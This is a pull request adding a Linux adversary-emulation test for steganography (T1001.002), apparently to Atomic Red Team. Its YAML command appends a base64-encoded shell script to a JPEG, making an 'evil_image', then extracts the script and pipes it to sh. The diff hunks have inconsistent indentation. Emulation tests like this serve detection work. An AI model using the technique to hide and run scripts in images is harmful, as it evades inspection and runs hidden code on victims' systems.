### PR TITLE
Added new atomic test for: T1001.002

### DIFF
--- a/atomics/T1001.002/T1001.002.yaml
+++ b/atomics/T1001.002/T1001.002.yaml
@@ -148,29 +148,30 @@ atomic_tests:
         Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
   
   - name: Execute Embedded Script in Image via Steganography
-  description: |
+    auto_generated_guid:
+    description: |
      This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then 
      embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.
-  supported_platforms:
-    - linux
-  input_arguments:
-     image:
-       description: "Image file to be embedded"
-       type: path
-       default: PathToAtomicsFolder/image.jpg
-     script:
-       description: "Shell Script file to be embedded and executed"
-       type: path
-       default: PathToAtomicsFolder/script.sh
-     evil_image:
-       description: "The modified image with embedded script"
-       type: path
-       default: PathToAtomicsFolder/evil_image.jpg
-  executor:
-      name: sh
-        elevation_required: false
-      command: |
-         cat "#{script}" | base64 | xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p | cat "#{image}" - > "#{evil_image}"
-         strings "#{evil_image}" | tail -n 1 | base64 -d | sh
-      cleanup_command: |
-         rm "#{evil_image}"
+    supported_platforms:
+     - linux
+    input_arguments:
+      image:
+        description: "Image file to be embedded"
+        type: path
+        default: PathToAtomicsFolder/image.jpg
+      script:
+        description: "Shell Script file to be embedded and executed"
+        type: path
+        default: PathToAtomicsFolder/script.sh
+      evil_image:
+        description: "The modified image with embedded script"
+        type: path
+        default: PathToAtomicsFolder/evil_image.jpg
+     executor:
+       name: sh
+         elevation_required: false
+       command: |
+          cat "#{script}" | base64 | xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p | cat "#{image}" - > "#{evil_image}"
+          strings "#{evil_image}" | tail -n 1 | base64 -d | sh
+       cleanup_command: |
+          rm "#{evil_image}"

--- a/atomics/T1001.002/T1001.002.yaml
+++ b/atomics/T1001.002/T1001.002.yaml
@@ -148,7 +148,6 @@ atomic_tests:
         Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
   
   - name: Execute Embedded Script in Image via Steganography
-    auto_generated_guid:
     description: |
      This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then 
      embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.

--- a/atomics/T1001.002/T1001.002.yaml
+++ b/atomics/T1001.002/T1001.002.yaml
@@ -146,3 +146,31 @@ atomic_tests:
         Remove-Item -Path "$HOME\result.ps1" -Force -ErrorAction Ignore 
         Remove-Item -Path "$HOME\textExtraction.ps1" -Force -ErrorAction Ignore
         Remove-Item -Path "$HOME\decoded.ps1" -Force -ErrorAction Ignore
+  
+  - name: Execute Embedded Script in Image via Steganography
+  description: |
+     This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then 
+     embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.
+  supported_platforms:
+    - linux
+  input_arguments:
+     image:
+       description: "Image file to be embedded"
+       type: path
+       default: PathToAtomicsFolder/image.jpg
+     script:
+       description: "Shell Script file to be embedded and executed"
+       type: path
+       default: PathToAtomicsFolder/script.sh
+     evil_image:
+       description: "The modified image with embedded script"
+       type: path
+       default: PathToAtomicsFolder/evil_image.jpg
+  executor:
+      name: sh
+        elevation_required: false
+      command: |
+         cat "#{script}" | base64 | xxd -p | sed 's/../& /g' | xargs -n1 | xxd -r -p | cat "#{image}" - > "#{evil_image}"
+         strings "#{evil_image}" | tail -n 1 | base64 -d | sh
+      cleanup_command: |
+         rm "#{evil_image}"


### PR DESCRIPTION
**Details:**
<!-- Insert details about this change here. Please include as much detail as possible -->
This pull request adds a new atomic test for T1001.002 for Linux. This atomic test demonstrates the execution of an embedded script in an image file using steganography techniques. The script is first encoded in base64 and then embedded within the pixels of the image. The modified image is created, and the script is extracted and executed on the target system.
   
**Testing:**
<!-- Note any testing done, local or automated here. -->
In this example, script `mal.sh`  is embedded in image `8bit.jpg`. The new malicious image file `evil_image.jpg` can be used to run the script.

<img width="911" alt="image" src="https://github.com/pratinavchandra/atomic-red-team/assets/25433956/503c87bb-bef8-4879-b513-b100213b8c7c">

The Evil image can be used to execute the embedded script:

<img width="609" alt="image" src="https://github.com/pratinavchandra/atomic-red-team/assets/25433956/40ff4f91-cedc-4b4b-b218-969428196034">

Both images are identical to a normal user:

<img width="116" alt="image" src="https://github.com/pratinavchandra/atomic-red-team/assets/25433956/8106ea12-92a1-414b-858d-416f7004ed5e">


**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->